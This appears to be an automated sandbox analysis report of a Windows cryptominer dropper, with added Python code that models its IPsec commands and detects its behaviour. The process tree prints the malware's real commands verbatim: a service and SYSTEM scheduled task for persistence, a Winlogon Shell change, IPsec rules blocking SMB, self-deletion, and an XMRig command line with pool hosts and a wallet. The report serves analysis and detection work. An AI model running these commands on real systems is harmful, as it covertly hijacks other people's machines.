Analysis

max time kernel: 151s
max time network: 140s
platform: windows7_x64
resource: win7v200430
submitted: 30-06-2020 12:05

Static task: static1
Behavioral task: behavioral1 (Sample 618a1e3551560b86454450f3ea580029.exe, Resource win7v200430)
Behavioral task: behavioral2 (Sample 618a1e3551560b86454450f3ea580029.exe, Resource win10)
General

Target: 618a1e3551560b86454450f3ea580029.exe
Size: 584KB
MD5: 618a1e3551560b86454450f3ea580029
SHA1: 39d86228750d1eebdb78f60b03c3b638acf72d34
SHA256: 6edb794a9f28cbd60dcb9fefc0e145f64c9e623b3df235a4a907ca948fd1edb9
SHA512: d5b309a0ff9b07e74c9cee1df37a627193393de7cc0fe079ab606d94b2beac948c8d7d25378de3cf87b00c7227c70fa8e49291d6060a7254e2ce0439a09c2305
Malware Config
Signatures
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications and is used by some sandboxes as the execution environment, so probing for its registry key is an analysis-evasion check.
Processes:
- 66545a.exe: Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Wine
- tqnkhe.exe: Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Wine
Launches sc.exe
Sc.exe is the Windows utility for controlling services; the exact "sc.exe Create" command line is shown in the process tree below.
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
- 1520 618a1e3551560b86454450f3ea580029.exe (2)
- 664 66545a.exe (2)
- 1564 tqnkhe.exe (2)
Loads dropped DLL 6 IoCs
Processes:
- 1520 618a1e3551560b86454450f3ea580029.exe (2)
- 664 66545a.exe (2)
- 1564 tqnkhe.exe
- 1808 (process name missing from the report)
Executes dropped EXE 3 IoCs
Processes:
- 664 66545a.exe
- 1564 tqnkhe.exe
- 1116 Js.exe
Deletes itself 1 IoCs
Processes:
- 528 cmd.exe
Detected Stratum cryptominer command
Js.exe is launched with stratum+tcp:// pool URLs, a wallet address and a donation level on its command line (see the process tree), i.e. it is being run as a Stratum mining client.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
ThreadHideFromDebugger stops a debugger from receiving events for the calling thread, a common anti-debugging step.
Processes:
- 664 66545a.exe
- 1564 tqnkhe.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
SeLockMemoryPrivilege is the privilege needed to allocate large pages; mining software enables it to back its hashing memory with large pages.
Processes:
- 1116 Js.exe: Token: SeLockMemoryPrivilege (2)
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
- 66545a.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe "
- tqnkhe.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\cZDUg\\tqnkhe.exe"
The first write resets the value, the second appends the dropped executable after Explorer.exe. The writers are 32-bit processes (their children run from SysWOW64), which is why the write is logged under the Wow6432Node view; when hunting, check both the 32-bit and the 64-bit Winlogon key for a Shell value that is anything other than explorer.exe.
Creates new service(s) 1 TTPs
-
Modifies service 2 TTPs 152 IoCs
Processes: netsh.exe (many instances)
The 152 entries are the same six registry operations repeated by every netsh.exe invocation, whatever its arguments:
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs
- Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\IPSec\OperationMode = "3"
The NapAgent keys appear for every netsh.exe child regardless of the command it ran, so they are noise for detection purposes; the IPSec\OperationMode value is the one operation tied to the policy the commands below assign.
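The ten netsh ipsec static commands that end.bat runs (listed under the cmd.exe entries in the process tree) build a single IPsec policy, and the registry entries above are only the side effects of that. To see what the policy does to traffic, the following is a small model of those commands, written for this page and not part of the sandbox report or of the malware: it parses each command into policy objects and evaluates sample inbound packets against the assigned policy. The matching semantics are simplified (first matching filter wins; the real IPsec driver prefers more specific filters, which makes no difference here because the two filters do not overlap).

```python
"""
Model of the ten `netsh ipsec static` commands run from end.bat in this report.
Example code written for this page, not part of the sandbox report or of the
malware: it parses the commands into policy objects and evaluates sample inbound
packets. Simplified semantics: first matching filter wins (the real IPsec driver
prefers more specific filters; the two filters here do not overlap, so same result).
"""
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Optional
import shlex

# Command lines copied verbatim from the netsh.exe children in the process tree.
NETSH_COMMANDS = [
    "netsh ipsec static add policy name=ipsec_ply",
    "netsh ipsec static add filterlist name=deny_pt",
    "netsh ipsec static add filterlist name=allow_pt",
    "netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP",
    "netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP",
    "netsh ipsec static add filteraction name=deny action=block",
    "netsh ipsec static add filteraction name=allow action=negotiate",
    "netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny",
    'netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"',
    "netsh ipsec static set policy name=ipsec_ply assign=y",
]

# dstaddr "ME" is netsh's name for the local host; dstport None means any port.
Filter = namedtuple("Filter", "srcaddr dstaddr protocol dstport")
Rule = namedtuple("Rule", "name filterlist filteraction psk")
Packet = namedtuple("Packet", "src dst protocol dstport")

@dataclass
class IpsecState:
    policies: dict = field(default_factory=dict)       # policy name -> [Rule]
    filterlists: dict = field(default_factory=dict)    # list name -> [Filter]
    filteractions: dict = field(default_factory=dict)  # action name -> block/permit/negotiate
    assigned: Optional[str] = None                     # the single active policy

def _kv(tokens):
    """['name=x', 'psk=(@=P#$bV4$'] -> {'name': 'x', 'psk': '(@=P#$bV4$'} (split on first '=')."""
    out = {}
    for tok in tokens:
        key, _, value = tok.partition("=")
        out[key.lower()] = value
    return out

def apply_command(state, cmdline):
    """Apply one `netsh ipsec static <verb> <object> key=value ...` command to state."""
    tokens = shlex.split(cmdline)  # also strips the quotes around the psk value
    if tokens[:3] != ["netsh", "ipsec", "static"]:
        raise ValueError(f"not a netsh ipsec static command: {cmdline}")
    verb, obj, args = tokens[3], tokens[4], _kv(tokens[5:])
    if (verb, obj) == ("add", "policy"):
        state.policies.setdefault(args["name"], [])
    elif (verb, obj) == ("add", "filterlist"):
        state.filterlists.setdefault(args["name"], [])
    elif (verb, obj) == ("add", "filter"):
        port = args.get("dstport")
        state.filterlists[args["filterlist"]].append(Filter(
            args.get("srcaddr", "any"), args.get("dstaddr", "any"),
            args.get("protocol", "any").upper(), int(port) if port else None))
    elif (verb, obj) == ("add", "filteraction"):
        state.filteractions[args["name"]] = args["action"].lower()
    elif (verb, obj) == ("add", "rule"):
        state.policies[args["policy"]].append(
            Rule(args["name"], args["filterlist"], args["filteraction"], args.get("psk")))
    elif (verb, obj) == ("set", "policy") and args.get("assign", "").lower() == "y":
        state.assigned = args["name"]
    else:
        raise ValueError(f"unsupported command: {cmdline}")

def build_state(commands):
    state = IpsecState()
    for cmd in commands:
        apply_command(state, cmd)
    return state

def _matches(f, p):
    return ((f.srcaddr == "any" or f.srcaddr == p.src)
            and (f.dstaddr == "any" or f.dstaddr == p.dst)
            and (f.protocol == "ANY" or f.protocol == p.protocol.upper())
            and (f.dstport is None or f.dstport == p.dstport))

def evaluate(state, p):
    """Filter action the assigned policy applies to packet p; 'permit' when nothing matches."""
    if state.assigned is None:
        return "permit"
    for rule in state.policies[state.assigned]:
        if any(_matches(f, p) for f in state.filterlists[rule.filterlist]):
            return state.filteractions[rule.filteraction]
    return "permit"

def dead_rules(state):
    """Rules bound to an empty filter list can never match, whatever action or PSK they carry."""
    return [r.name for rules in state.policies.values() for r in rules
            if not state.filterlists[r.filterlist]]

if __name__ == "__main__":
    s = build_state(NETSH_COMMANDS)
    print({p: evaluate(s, Packet("10.0.0.5", "ME", "TCP", p)) for p in (445, 139, 80)}, dead_rules(s))
```

Running it shows the point that is easy to miss when reading the ten commands one at a time: nothing is ever added to allow_pt, so the "allow" rule with the pre-shared key can never match, and the assigned policy reduces to blocking inbound TCP/445 and TCP/139 to the host from any source while leaving everything else untouched.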
Suspicious use of WriteProcessMemory 168 IoCs
Processes (each parent-to-child write is logged four times; shown once here, and the report truncates the list):
- 1520 618a1e3551560b86454450f3ea580029.exe -> 664 66545a.exe
- 1520 618a1e3551560b86454450f3ea580029.exe -> 528 cmd.exe
- 664 66545a.exe -> 1564 tqnkhe.exe
- 664 66545a.exe -> 1916 cmd.exe
- 1564 tqnkhe.exe -> 1504 cmd.exe
- 1504 cmd.exe -> 924 netsh.exe
- 1504 cmd.exe -> 1840 netsh.exe
- 1504 cmd.exe -> 1752 netsh.exe
- 1504 cmd.exe -> 1804 netsh.exe
- 1504 cmd.exe -> 1520 netsh.exe
- 1504 cmd.exe -> 832 netsh.exe
- 1504 cmd.exe -> 1960 netsh.exe
- 1504 cmd.exe -> 300 netsh.exe
- 1504 cmd.exe -> 1588 netsh.exe
- 1564 tqnkhe.exe -> 692 cmd.exe
- 1504 cmd.exe -> 984 netsh.exe
Every target is a direct child of the writer, which is the pattern of ordinary process creation rather than injection into an unrelated process. Note also that PID 1520 is first the original sample and later a netsh.exe child of cmd.exe 1504: the sample has exited (cmd.exe 528 deletes it) and the PID has been reused, so correlate by process start time rather than by PID alone.
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
- 1520 618a1e3551560b86454450f3ea580029.exe (4)
- 664 66545a.exe (1)
- 1564 tqnkhe.exe (42)
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
- 66545a.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- tqnkhe.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Drops file in Windows directory 66 IoCs
Processes:
- 66545a.exe: File created C:\Windows\cZDUg\tqnkhe.exe, C:\Windows\cZDUg\tscl.html, C:\Windows\IME\tps.exe, C:\Windows\boy.exe
- tqnkhe.exe: File created C:\Windows\end.bat (also opened for modification); File opened for modification C:\Windows\cZDUg\tscl.html; and under C:\Windows\cZDUg\:
  - executables and scripts: svchost.exe, Cstr.exe, chrome..exe, Js.exe, qdx.bat, s.bat
  - driver: WinRing0x64.sys
  - data: Cstr.xml, Cstr.fb, chrome..xml, chrome..fb, TFf
  - DLLs: tibe.dll, tibe-1.dll, tibe-2.dll, trch.dll, trch-0.dll, trch-1.dll, trfo.dll, trfo-0.dll, trfo-2.dll, tucl.dll, tucl-1.dll, ucl.dll, etch-0.dll, etchCore-0.x86.dll, etchCore-0.x64.dll, eteb-2.dll, etebCore-2.x86.dll, etebCore-2.x64.dll, esco-0.dll, exma.dll, exma-1.dll, adfw.dll, adfw-2.dll, cnli-0.dll, cnli-1.dll, coli-0.dll, crli-0.dll, dmgd-1.dll, dmgd-4.dll, pcla-0.dll, posh-0.dll, riar.dll, riar-2.dll, xdvl-0.dll, zibe.dll, ip.dll, pcre-0.dll, pcrecpp-0.dll, pcreposix-0.dll, libxml2.dll, libiconv-2.dll, iconv.dll, libeay32.dll, ssleay32.dll, zlib1.dll
Note: the tibe/trch/trfo/tucl/etch/eteb/esco/exma/adfw/cnli/coli/crli/dmgd/pcla/posh/riar/xdvl/zibe library names are the dependency DLLs of the leaked FuzzBunch exploitation framework, and WinRing0x64.sys is the kernel driver that XMRig ships for its MSR tweaks. The report records only that these files were written, not that any of them were executed; the svchost.exe dropped here is not the system binary and should be hashed and compared against it.
Processes

The bracketed number is the depth marker from the report; the line under each image is its command line.

[1] C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe
    "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"
    - Suspicious use of SetWindowsHookEx
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses

  [2] C:\Users\Admin\AppData\Local\Temp\66545a.exe
      "C:\Users\Admin\AppData\Local\Temp\66545a.exe"
      - Identifies Wine through registry keys
      - Suspicious use of SetWindowsHookEx
      - Loads dropped DLL
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Modifies WinLogon for persistence
      - Suspicious use of WriteProcessMemory
      - Suspicious behavior: EnumeratesProcesses
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Drops file in Windows directory

    [3] C:\Windows\cZDUg\tqnkhe.exe
        C:\Windows\cZDUg\tqnkhe.exe
        - Identifies Wine through registry keys
        - Suspicious use of SetWindowsHookEx
        - Loads dropped DLL
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Modifies WinLogon for persistence
        - Suspicious use of WriteProcessMemory
        - Suspicious behavior: EnumeratesProcesses
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Drops file in Windows directory

      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\end.bat" "
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=ipsec_ply
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=deny_pt
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=allow_pt
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=deny action=block
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=allow action=negotiate
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
            - Modifies service
        [5] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static set policy name=ipsec_ply assign=y
            - Modifies service

      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\end.bat" "
          (second run of end.bat: the same ten netsh.exe children at depth 5 with identical command lines, each tagged Modifies service)

      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\end.bat" "
          (third run: the same ten netsh.exe children; in the report the "add filterlist name=allow_pt" child of this run carries no signature tag)

      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\end.bat" "
          (fourth run: no children recorded)

      What end.bat does: as logged, no "add filter" command ever targets allow_pt, so the allow rule (negotiate IPsec with the pre-shared key) has nothing to match and is inert. The assigned policy therefore reduces to blocking inbound TCP/445 and TCP/139 to this host from any source, which keeps other SMB-based intruders off an already-compromised machine. The block is an IPsec policy, not a Windows Firewall rule, so it does not show up in the firewall rule list; list it with "netsh ipsec static show all".

      [4] C:\Windows\SysWOW64\sc.exe
          sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
          (a manual-start service whose "binary" is a cmd.exe one-liner launching C:\Windows\boy.exe, dropped earlier by 66545a.exe; the misspelled names are the attacker's strings, not transcription errors, and are usable as-is for hunting)

      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\cZDUg\qdx.bat" "

        [5] C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\cZDUg\tqnkhe.exe" /SC ONSTART
            - Creates scheduled task(s)
            (runs tqnkhe.exe as SYSTEM at every boot from a task name placed inside the legitimate \Microsoft\Windows\ task tree; with the Winlogon Shell change this gives two independent boot-time persistence paths)

      [4] C:\Windows\cZDUg\Js.exe
          "C:\Windows\cZDUg\Js.exe" -o stratum+tcp://rx.monerorx.com:8888 -o stratum+tcp://rx1.monerorx.com:9855 -o ttt.ppxfghdfhdfhfghxmr.com:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          (-o pool, -u wallet, -p password, -k keep-alive and --donate-level are the XMRig command-line options; the three pool hosts and the wallet address are the network and payment IOCs for this sample)

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\66545a.exe"

  [2] C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"
      - Deletes itself
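The process tree above contains every command line needed to write host detections for this chain. The following is an added example, not part of the report and not any product's rule set: it encodes the observed behaviours as rules over constructed Sysmon-style process-creation and registry-set records (the records are built here from the command lines above and are not the sandbox's own log format, and the benign netsh and regedit records are included as negative controls) and extracts the miner's pool and wallet IOCs from the Js.exe command line.

```python
"""
Host detections for the chain in this report, run over constructed
Sysmon-style process-creation and registry-set records. Example code added
for this page, not the sandbox's rules or log format; the records below are
built from the command lines in the process tree above.
"""
import re

# Standard 95-character Monero address: '4' followed by 94 base58 characters.
MONERO_ADDR = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")
STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl)://\S+", re.I)
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")

PROCESS_EVENTS = [  # constructed from the process tree; Sysmon event 1 field names
    {"Image": r"C:\Windows\SysWOW64\netsh.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": 'netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"'},
    {"Image": r"C:\Windows\SysWOW64\netsh.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP"},
    {"Image": r"C:\Windows\SysWOW64\netsh.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "netsh ipsec static add policy name=ipsec_ply"},  # nothing to flag on its own
    {"Image": r"C:\Windows\SysWOW64\sc.exe", "ParentImage": r"C:\Windows\cZDUg\tqnkhe.exe",
     "CommandLine": r'sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"'},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\cZDUg\tqnkhe.exe" /SC ONSTART'},
    {"Image": r"C:\Windows\cZDUg\Js.exe", "ParentImage": r"C:\Windows\cZDUg\tqnkhe.exe",
     "CommandLine": r'"C:\Windows\cZDUg\Js.exe" -o stratum+tcp://rx.monerorx.com:8888 -o stratum+tcp://rx1.monerorx.com:9855 -o ttt.ppxfghdfhdfhfghxmr.com:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1'},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe", "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe",
     "CommandLine": r'cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"'},
]
REGISTRY_EVENTS = [  # Sysmon event 13 field names; the second record is a benign control
    {"Image": r"C:\Windows\cZDUg\tqnkhe.exe", "Details": r"Explorer.exe C:\Windows\cZDUg\tqnkhe.exe",
     "TargetObject": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"},
    {"Image": r"C:\Windows\regedit.exe", "Details": "explorer.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"},
]

def _quoted_arg(cmdline, flag):
    """Value following `flag` (e.g. /TR or del), with surrounding quotes removed."""
    m = re.search(r"(?:^|\s)" + re.escape(flag) + r'\s+"?([^"]+?)"?(?=\s|$)', cmdline, re.I)
    return m.group(1) if m else None

def detect_process(ev):
    """Rules for one process-creation record; returns [(rule_name, evidence)]."""
    name = ev["Image"].lower().rsplit("\\", 1)[-1]
    cl, low, hits = ev["CommandLine"], ev["CommandLine"].lower(), []
    if name == "netsh.exe" and "ipsec static" in low:
        if "psk=" in low:                                   # pre-shared key set from a script
            hits.append(("ipsec_rule_with_psk", cl))
        if "add filter " in low and re.search(r"dstport=(445|139)\b", low):
            hits.append(("ipsec_filter_smb_ports", cl))     # SMB/NetBIOS ports being filtered
    if name == "sc.exe" and re.search(r"\bcreate\b", low) and \
            re.search(r'binpath=\s*"?\s*(?:cmd(?:\.exe)?|powershell(?:\.exe)?)\b', low):
        hits.append(("service_binpath_cmd", cl))            # service "binary" is a shell one-liner
    if name == "schtasks.exe" and "/create" in low and "/ru system" in low:
        target = (_quoted_arg(cl, "/TR") or "").lower()
        if target and not target.startswith(TRUSTED_DIRS):
            hits.append(("schtasks_system_untrusted_target", target))
    if STRATUM_URL.search(cl) or MONERO_ADDR.search(cl) or "--donate-level" in low:
        hits.append(("cryptominer_cmdline", miner_iocs(cl)))
    if name == "cmd.exe":
        target = _quoted_arg(cl, "del")
        if target and target.lower() == ev.get("ParentImage", "").lower():
            hits.append(("self_delete", target))            # parent asked a child shell to delete it
    return hits

def miner_iocs(cmdline):
    """Pool URLs (-o) and wallet (-u) from an XMRig-style command line."""
    pools = re.findall(r"(?:^|\s)-o\s+(\S+)", cmdline)
    wallet = re.search(r"(?:^|\s)-u\s+(\S+)", cmdline)
    return {"pools": pools, "wallet": wallet.group(1) if wallet else None}

def detect_registry(ev):
    """Winlogon Shell must be exactly explorer.exe; anything appended is a second autostart."""
    key = ev["TargetObject"].lower().replace("/", "\\")
    if key.endswith("\\winlogon\\shell") and ev["Details"].strip().lower() != "explorer.exe":
        return [("winlogon_shell_modified", f'{ev["TargetObject"]} = {ev["Details"]!r}')]
    return []

def detect_all(proc_events, reg_events):
    hits = []
    for ev in proc_events:
        hits.extend(detect_process(ev))
    for ev in reg_events:
        hits.extend(detect_registry(ev))
    return hits

if __name__ == "__main__":
    for rule, evidence in detect_all(PROCESS_EVENTS, REGISTRY_EVENTS):
        print(f"{rule:34} {evidence}")
```

The rules deliberately key on what the attacker cannot easily change without losing the effect (an IPsec rule carrying a PSK, a service whose binPath is a shell, a SYSTEM task pointing outside the trusted system directories, a Winlogon Shell value that is not exactly explorer.exe, a child cmd.exe deleting its own parent) rather than on the random directory name or the misspelled service name, which are still worth adding as exact-match IOCs for this specific sample.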
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

Dropped files (a count in parentheses means the report lists the same path that many times):
- C:\Users\Admin\AppData\Local\Temp\66545a.exe (2)
- C:\Windows\cZDUg\Js.exe
- C:\Windows\cZDUg\qdx.bat
- C:\Windows\cZDUg\tqnkhe.exe (2)
- C:\Windows\cZDUg\tscl.html
- C:\Windows\end.bat (3)
- \Users\Admin\AppData\Local\Temp\66545a.exe (2)
- \Windows\cZDUg\Js.exe (2)
- \Windows\cZDUg\tqnkhe.exe (2)

Memory dumps, named memory/<PID>-<index>-<range>:
- mapping-only dumps (memory/<PID>-<index>-0x0000000000000000-mapping.dmp) for PID (index): 300 (25, 40), 524 (38, 51), 528 (4), 664 (2), 692 (28), 756 (36), 832 (23), 924 (18), 984 (29), 1044 (44), 1064 (48), 1116 (33, 59), 1224 (37, 49), 1344 (39), 1352 (32), 1376 (43), 1468 (30), 1504 (16), 1520 (22), 1556 (56), 1564 (10), 1588 (26, 52), 1608 (41), 1628 (50), 1692 (54), 1752 (20), 1796 (47), 1804 (21, 46), 1832 (35), 1840 (19), 1844 (53), 1864 (34), 1876 (45), 1916 (12), 1920 (42), 1960 (24)
- region dumps (68KB each), the only ones with content worth opening first; all belong to 66545a.exe (664) and tqnkhe.exe (1564):
  - memory/664-5-0x0000000005600000-0x0000000005611000-memory.dmp
  - memory/664-6-0x0000000005A10000-0x0000000005A21000-memory.dmp
  - memory/1564-13-0x00000000055F0000-0x0000000005601000-memory.dmp
  - memory/1564-14-0x0000000005A00000-0x0000000005A11000-memory.dmp
  - memory/1564-62-0x00000000083B0000-0x00000000083C1000-memory.dmp
  - memory/1564-63-0x00000000087C0000-0x00000000087D1000-memory.dmp